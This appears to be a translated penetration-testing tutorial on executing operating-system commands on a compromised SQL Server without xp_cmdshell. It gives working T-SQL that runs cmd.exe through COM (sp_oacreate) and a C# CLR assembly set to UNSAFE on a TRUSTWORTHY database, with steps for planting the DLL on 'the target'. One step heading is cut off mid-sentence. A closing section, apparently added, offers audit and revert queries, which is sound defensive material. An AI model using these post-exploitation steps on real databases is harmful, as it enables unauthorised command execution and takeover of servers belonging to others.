SQL Server does not have xp_cmdshell to execute commands

enhackapt


Executing commands using COM

(The Ole Automation Procedures component needs to be enabled)


```sql
declare @luan int, @exec int, @text int, @str varchar(8000);
exec sp_oacreate '{72C24DD5-D70A-438B-8A42-98424B88AFB8}', @luan output;
exec sp_oamethod @luan, 'exec', @exec output, 'C:\\Windows\\System32\\cmd.exe /c whoami';
exec sp_oamethod @exec, 'StdOut', @text out;
exec sp_oamethod @text, 'readall', @str out;
select @str;
```




If Ole Automation Procedures is not enabled, you can use the following commands to enable it:


```sql
sp_configure 'show advanced options', 1;
GO
RECONFIGURE;
GO
sp_configure 'Ole Automation Procedures', 1;
GO
RECONFIGURE;
GO
```

Language: C#
Create a class library in Visual Studio (VS)


```csharp
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;

namespace shellexec
{
    public class exec
    {
        public static string cmd(string command)
        {
            System.Diagnostics.Process pro = new System.Diagnostics.Process();
            pro.StartInfo.FileName = "cmd.exe";
            pro.StartInfo.UseShellExecute = false;
            pro.StartInfo.RedirectStandardError = true;   // Standard error
            pro.StartInfo.RedirectStandardInput = true;   // Standard input
            pro.StartInfo.RedirectStandardOutput = true;  // Standard output
            pro.StartInfo.CreateNoWindow = true;          // Do not create a window for the process
            pro.Start();
            pro.StandardInput.WriteLine(command + "&&exit"); // Write the command
            pro.StandardInput.AutoFlush = true;           // Flush the buffer automatically
            string output = pro.StandardOutput.ReadToEnd(); // Read the execution result
            pro.WaitForExit();                            // Wait for execution to complete and exit
            pro.Close();
            return output.ToString();
        }
    }
}
```


After building the DLL, you can write it to the target using the hex method, or upload it via a shell. Then start the setup:
1. CLR integration needs to be enabled on the target database instance


```sql
exec sp_configure 'clr enabled',1; --Enable CLR in SQL Server
reconfigure;
go
```

2. The TRUSTWORTHY property of the target database needs to be turned on. You can use the following statement to enable it


```sql
ALTER DATABASE [<Database name>] SET TRUSTWORTHY ON
```

3. Register the DLL in the database


```sql
CREATE ASSEMBLY MySqlCLR FROM '<path to the dll>' --MySqlCLR is the variable name after importing the dll
```

4. Create a function
(construct the parameter types to match the parameters of the corresponding function; if it returns a string, remember to set RETURNS [nvarchar] (max); EXTERNAL NAME directly names the DLL's namespace, class, and function)


```sql
CREATE FUNCTION [dbo].[cmd2]
(
    @cmd AS NVARCHAR(max)
)
RETURNS [nvarchar] (max) WITH EXECUTE AS CALLER
AS
EXTERNAL NAME [MySqlCLR].[shellexec.exec].cmd --shellexec is the namespace, exec is the class name, cmd is the function name
GO
```

access, otherwise an error will be reported during deployment


```sql
ALTER ASSEMBLY [MySqlCLR]
WITH PERMISSION_SET = UNSAFE
```

6. Call the stored procedure or function


```sql
select [dbo].[cmd2]('whoami')
```
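To audit an instance for the settings both methods above depend on, the following T-SQL is an added example, not part of the original post. It assumes a login that can read server and database metadata (for example a sysadmin) and is run once per database for section 3; the `clr strict security` row only appears on SQL Server 2017 and later.

```sql
-- Added audit example (not from the original post).
-- 1. Instance-level switches used by the COM and CLR methods, plus xp_cmdshell itself.
--    configured_value <> running_value means a change is pending a RECONFIGURE.
SELECT name,
       CAST(value AS int)        AS configured_value,
       CAST(value_in_use AS int) AS running_value
FROM sys.configurations
WHERE name IN (N'Ole Automation Procedures', N'clr enabled',
               N'clr strict security', N'xp_cmdshell',
               N'show advanced options')
ORDER BY name;

-- 2. Databases marked TRUSTWORTHY, with their owner login.
--    msdb is excluded because it ships with TRUSTWORTHY ON.
SELECT d.name                   AS database_name,
       SUSER_SNAME(d.owner_sid) AS owner_login
FROM sys.databases AS d
WHERE d.is_trustworthy_on = 1
  AND d.name <> N'msdb';

-- 3. User-defined assemblies in the current database that are not SAFE,
--    and the T-SQL functions or procedures bound to them.
SELECT a.name                                   AS assembly_name,
       a.permission_set_desc,
       a.create_date,
       a.modify_date,
       SCHEMA_NAME(o.schema_id) + N'.' + o.name AS bound_object,
       o.type_desc,
       m.assembly_class,
       m.assembly_method
FROM sys.assemblies AS a
LEFT JOIN sys.assembly_modules AS m ON m.assembly_id = a.assembly_id
LEFT JOIN sys.objects          AS o ON o.object_id   = m.object_id
WHERE a.is_user_defined = 1
  AND a.permission_set_desc <> N'SAFE_ACCESS'
ORDER BY a.modify_date DESC;

-- 4. Revert anything that is not required (review the results above first).
-- EXEC sp_configure 'Ole Automation Procedures', 0; RECONFIGURE;
-- EXEC sp_configure 'clr enabled', 0; RECONFIGURE;
-- ALTER DATABASE [<Database name>] SET TRUSTWORTHY OFF;
```

An assembly reported in section 3 with `UNSAFE_ACCESS` and a recent `modify_date`, bound to a scalar function that takes a single string argument, matches the pattern this post describes.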






